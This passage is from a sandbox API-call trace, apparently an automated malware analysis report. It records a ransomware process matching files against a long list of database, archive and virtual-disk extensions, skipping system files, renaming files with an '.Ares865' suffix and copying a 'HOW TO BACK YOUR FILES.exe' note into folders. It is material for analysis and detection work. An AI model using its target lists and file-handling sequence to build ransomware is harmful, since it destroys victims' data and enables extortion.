lstrcmpiW (lpString1="[1]", lpString2="dbb") returned -1 [0065.364] lstrlenW (lpString="vmdk") returned 4 [0065.364] lstrcmpiW (lpString1="k[1]", lpString2="vmdk") returned -1 [0065.364] lstrlenW (lpString="rar") returned 3 [0065.364] lstrcmpiW (lpString1="[1]", lpString2="rar") returned -1 [0065.364] lstrlenW (lpString="zip") returned 3 [0065.364] lstrcmpiW (lpString1="[1]", lpString2="zip") returned -1 [0065.364] lstrlenW (lpString="tgz") returned 3 [0065.365] lstrcmpiW (lpString1="[1]", lpString2="tgz") returned -1 [0065.365] lstrlenW (lpString="vbox") returned 4 [0065.365] lstrcmpiW (lpString1="k[1]", lpString2="vbox") returned -1 [0065.365] lstrlenW (lpString="vdi") returned 3 [0065.365] lstrcmpiW (lpString1="[1]", lpString2="vdi") returned -1 [0065.365] lstrlenW (lpString="vhd") returned 3 [0065.365] lstrcmpiW (lpString1="[1]", lpString2="vhd") returned -1 [0065.365] lstrlenW (lpString="vhdx") returned 4 [0065.365] lstrcmpiW (lpString1="k[1]", lpString2="vhdx") returned -1 [0065.365] lstrlenW (lpString="avhd") returned 4 [0065.365] lstrcmpiW (lpString1="k[1]", lpString2="avhd") returned 1 [0065.365] lstrlenW (lpString="db") returned 2 [0065.365] lstrcmpiW (lpString1="1]", lpString2="db") returned -1 [0065.365] lstrlenW (lpString="db2") returned 3 [0065.366] lstrcmpiW (lpString1="[1]", lpString2="db2") returned -1 [0065.366] lstrlenW (lpString="db3") returned 3 [0065.366] lstrcmpiW (lpString1="[1]", lpString2="db3") returned -1 [0065.366] lstrlenW (lpString="dbf") returned 3 [0065.366] lstrcmpiW (lpString1="[1]", lpString2="dbf") returned -1 [0065.366] lstrlenW (lpString="mdf") returned 3 [0065.366] lstrcmpiW (lpString1="[1]", lpString2="mdf") returned -1 [0065.366] lstrlenW (lpString="mdb") returned 3 [0065.366] lstrcmpiW (lpString1="[1]", lpString2="mdb") returned -1 [0065.366] lstrlenW (lpString="sql") returned 3 [0065.366] lstrcmpiW (lpString1="[1]", lpString2="sql") returned -1 [0065.367] lstrlenW (lpString="sqlite") returned 6 [0065.367] lstrcmpiW (lpString1="ink[1]", lpString2="sqlite") returned -1 [0065.367] lstrlenW (lpString="sqlite3") returned 7 [0065.367] lstrcmpiW (lpString1="link[1]", lpString2="sqlite3") returned -1 [0065.367] lstrlenW (lpString="sqlitedb") returned 8 [0065.367] lstrcmpiW (lpString1="wlink[1]", lpString2="sqlitedb") returned 1 [0065.367] lstrlenW (lpString="xml") returned 3 [0065.367] lstrcmpiW (lpString1="[1]", lpString2="xml") returned -1 [0065.367] lstrlenW (lpString="$er") returned 3 [0065.367] lstrcmpiW (lpString1="[1]", lpString2="$er") returned 1 [0065.367] lstrlenW (lpString="4dd") returned 3 [0065.367] lstrcmpiW (lpString1="[1]", lpString2="4dd") returned -1 [0065.367] lstrlenW (lpString="4dl") returned 3 [0065.367] lstrcmpiW (lpString1="[1]", lpString2="4dl") returned -1 [0065.367] lstrlenW (lpString="^^^") returned 3 [0065.367] lstrcmpiW (lpString1="[1]", lpString2="^^^") returned -1 [0065.367] lstrlenW (lpString="abs") returned 3 [0065.367] lstrcmpiW (lpString1="[1]", lpString2="abs") returned -1 [0065.367] lstrlenW (lpString="abx") returned 3 [0065.367] lstrcmpiW (lpString1="[1]", lpString2="abx") returned -1 [0065.367] lstrlenW (lpString="accdb") returned 5 [0065.368] lstrcmpiW (lpString1="nk[1]", lpString2="accdb") returned 1 [0065.368] lstrlenW (lpString="accdc") returned 5 [0065.368] lstrcmpiW (lpString1="nk[1]", lpString2="accdc") returned 1 [0065.368] lstrlenW (lpString="accde") returned 5 [0065.368] lstrcmpiW (lpString1="nk[1]", lpString2="accde") returned 1 [0065.368] lstrlenW (lpString="accdr") returned 5 [0065.368] lstrcmpiW (lpString1="nk[1]", lpString2="accdr") returned 1 [0065.368] lstrlenW (lpString="accdt") returned 5 [0065.368] lstrcmpiW (lpString1="nk[1]", lpString2="accdt") returned 1 [0065.368] lstrlenW (lpString="accdw") returned 5 [0065.368] lstrcmpiW (lpString1="nk[1]", lpString2="accdw") returned 1 [0065.368] lstrlenW (lpString="accft") returned 5 [0065.368] lstrcmpiW (lpString1="nk[1]", lpString2="accft") returned 1 [0065.368] lstrlenW (lpString="adb") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="adb") returned -1 [0065.368] lstrlenW (lpString="adb") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="adb") returned -1 [0065.368] lstrlenW (lpString="ade") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="ade") returned -1 [0065.368] lstrlenW (lpString="adf") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="adf") returned -1 [0065.368] lstrlenW (lpString="adn") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="adn") returned -1 [0065.368] lstrlenW (lpString="adp") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="adp") returned -1 [0065.368] lstrlenW (lpString="alf") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="alf") returned -1 [0065.368] lstrlenW (lpString="ask") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="ask") returned -1 [0065.368] lstrlenW (lpString="btr") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="btr") returned -1 [0065.368] lstrlenW (lpString="cat") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="cat") returned -1 [0065.368] lstrlenW (lpString="cdb") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="cdb") returned -1 [0065.368] lstrlenW (lpString="ckp") returned 3 [0065.368] lstrcmpiW (lpString1="[1]", lpString2="ckp") returned -1 [0065.369] lstrlenW (lpString="cma") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="cma") returned -1 [0065.369] lstrlenW (lpString="cpd") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="cpd") returned -1 [0065.369] lstrlenW (lpString="dacpac") returned 6 [0065.369] lstrcmpiW (lpString1="ink[1]", lpString2="dacpac") returned 1 [0065.369] lstrlenW (lpString="dad") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="dad") returned -1 [0065.369] lstrlenW (lpString="dadiagrams") returned 10 [0065.369] lstrlenW (lpString="daschema") returned 8 [0065.369] lstrcmpiW (lpString1="wlink[1]", lpString2="daschema") returned 1 [0065.369] lstrlenW (lpString="db-journal") returned 10 [0065.369] lstrlenW (lpString="db-shm") returned 6 [0065.369] lstrcmpiW (lpString1="ink[1]", lpString2="db-shm") returned 1 [0065.369] lstrlenW (lpString="db-wal") returned 6 [0065.369] lstrcmpiW (lpString1="ink[1]", lpString2="db-wal") returned 1 [0065.369] lstrlenW (lpString="dbc") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="dbc") returned -1 [0065.369] lstrlenW (lpString="dbs") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="dbs") returned -1 [0065.369] lstrlenW (lpString="dbt") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="dbt") returned -1 [0065.369] lstrlenW (lpString="dbv") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="dbv") returned -1 [0065.369] lstrlenW (lpString="dbx") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="dbx") returned -1 [0065.369] lstrlenW (lpString="dcb") returned 3 [0065.369] lstrcmpiW (lpString1="[1]", lpString2="dcb") returned -1 [0065.370] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].Ares865") returned 85 [0065.370] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].ares865"), dwFlags=0x1) returned 1 [0065.370] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.371] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0065.371] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0065.371] CloseHandle (hObject=0x0) returned 0 [0065.371] CloseHandle (hObject=0x164) returned 1 [0065.371] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4abe0700, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.371] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.371] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4abe0700, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.371] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.371] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0065.371] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0065.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.371] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 67 [0065.371] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.371] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.371] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.372] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.372] GetLastError () returned 0x0 [0065.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.372] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.372] CloseHandle (hObject=0x12c) returned 1 [0065.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.372] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.372] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.372] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.372] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.372] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.372] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.372] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.372] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.372] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.373] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.373] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0065.373] lstrlenW (lpString="desktop.ini") returned 11 [0065.373] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\*") returned 69 [0065.373] lstrcpyW (in: lpString1=0x2cce488, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0065.373] lstrlenW (lpString="desktop.ini") returned 11 [0065.373] lstrlenW (lpString="Ares865") returned 7 [0065.373] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0065.373] lstrlenW (lpString=".dll") returned 4 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0065.373] lstrlenW (lpString=".lnk") returned 4 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0065.373] lstrlenW (lpString=".ini") returned 4 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0065.373] lstrlenW (lpString=".sys") returned 4 [0065.373] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0065.373] lstrlenW (lpString="desktop.ini") returned 11 [0065.373] lstrlenW (lpString="bak") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0065.374] lstrlenW (lpString="ba_") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0065.374] lstrlenW (lpString="dbb") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0065.374] lstrlenW (lpString="vmdk") returned 4 [0065.374] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0065.374] lstrlenW (lpString="rar") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0065.374] lstrlenW (lpString="zip") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0065.374] lstrlenW (lpString="tgz") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0065.374] lstrlenW (lpString="vbox") returned 4 [0065.374] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0065.374] lstrlenW (lpString="vdi") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0065.374] lstrlenW (lpString="vhd") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0065.374] lstrlenW (lpString="vhdx") returned 4 [0065.374] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0065.374] lstrlenW (lpString="avhd") returned 4 [0065.374] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0065.374] lstrlenW (lpString="db") returned 2 [0065.374] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0065.374] lstrlenW (lpString="db2") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0065.374] lstrlenW (lpString="db3") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0065.374] lstrlenW (lpString="dbf") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0065.374] lstrlenW (lpString="mdf") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0065.374] lstrlenW (lpString="mdb") returned 3 [0065.374] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0065.374] lstrlenW (lpString="sql") returned 3 [0065.375] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0065.375] lstrlenW (lpString="sqlite") returned 6 [0065.375] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0065.375] lstrlenW (lpString="sqlite3") returned 7 [0065.375] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0065.375] lstrlenW (lpString="sqlitedb") returned 8 [0065.375] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0065.375] lstrlenW (lpString="xml") returned 3 [0065.375] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0065.375] lstrlenW (lpString="$er") returned 3 [0065.375] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0065.375] lstrlenW (lpString="4dd") returned 3 [0065.375] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0065.375] lstrlenW (lpString="4dl") returned 3 [0065.375] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0065.375] lstrlenW (lpString="^^^") returned 3 [0065.375] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0065.375] lstrlenW (lpString="abs") returned 3 [0065.375] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0065.375] lstrlenW (lpString="abx") returned 3 [0065.375] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0065.375] lstrlenW (lpString="accdb") returned 5 [0065.375] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0065.375] lstrlenW (lpString="accdc") returned 5 [0065.375] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0065.375] lstrlenW (lpString="accde") returned 5 [0065.375] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0065.375] lstrlenW (lpString="accdr") returned 5 [0065.375] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0065.375] lstrlenW (lpString="accdt") returned 5 [0065.375] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0065.375] lstrlenW (lpString="accdw") returned 5 [0065.375] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0065.375] lstrlenW (lpString="accft") returned 5 [0065.375] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0065.375] lstrlenW (lpString="adb") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.376] lstrlenW (lpString="adb") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.376] lstrlenW (lpString="ade") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0065.376] lstrlenW (lpString="adf") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0065.376] lstrlenW (lpString="adn") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0065.376] lstrlenW (lpString="adp") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0065.376] lstrlenW (lpString="alf") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0065.376] lstrlenW (lpString="ask") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0065.376] lstrlenW (lpString="btr") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0065.376] lstrlenW (lpString="cat") returned 3 [0065.376] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0065.376] lstrlenW (lpString="cdb") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0065.377] lstrlenW (lpString="ckp") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0065.377] lstrlenW (lpString="cma") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0065.377] lstrlenW (lpString="cpd") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0065.377] lstrlenW (lpString="dacpac") returned 6 [0065.377] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0065.377] lstrlenW (lpString="dad") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0065.377] lstrlenW (lpString="dadiagrams") returned 10 [0065.377] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0065.377] lstrlenW (lpString="daschema") returned 8 [0065.377] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0065.377] lstrlenW (lpString="db-journal") returned 10 [0065.377] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0065.377] lstrlenW (lpString="db-shm") returned 6 [0065.377] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0065.377] lstrlenW (lpString="db-wal") returned 6 [0065.377] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0065.377] lstrlenW (lpString="dbc") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0065.377] lstrlenW (lpString="dbs") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0065.377] lstrlenW (lpString="dbt") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0065.377] lstrlenW (lpString="dbv") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0065.377] lstrlenW (lpString="dbx") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0065.377] lstrlenW (lpString="dcb") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0065.377] lstrlenW (lpString="dct") returned 3 [0065.377] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0065.377] lstrlenW (lpString="dcx") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0065.378] lstrlenW (lpString="ddl") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0065.378] lstrlenW (lpString="dlis") returned 4 [0065.378] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0065.378] lstrlenW (lpString="dp1") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0065.378] lstrlenW (lpString="dqy") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0065.378] lstrlenW (lpString="dsk") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0065.378] lstrlenW (lpString="dsn") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0065.378] lstrlenW (lpString="dtsx") returned 4 [0065.378] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0065.378] lstrlenW (lpString="dxl") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0065.378] lstrlenW (lpString="eco") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0065.378] lstrlenW (lpString="ecx") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0065.378] lstrlenW (lpString="edb") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0065.378] lstrlenW (lpString="epim") returned 4 [0065.378] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0065.378] lstrlenW (lpString="fcd") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0065.378] lstrlenW (lpString="fdb") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0065.378] lstrlenW (lpString="fic") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0065.378] lstrlenW (lpString="flexolibrary") returned 12 [0065.378] lstrlenW (lpString="fm5") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0065.378] lstrlenW (lpString="fmp") returned 3 [0065.378] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0065.379] lstrlenW (lpString="fmp12") returned 5 [0065.379] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0065.379] lstrlenW (lpString="fmpsl") returned 5 [0065.379] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0065.379] lstrlenW (lpString="fol") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0065.379] lstrlenW (lpString="fp3") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0065.379] lstrlenW (lpString="fp4") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0065.379] lstrlenW (lpString="fp5") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0065.379] lstrlenW (lpString="fp7") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0065.379] lstrlenW (lpString="fpt") returned 3 [0065.379] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 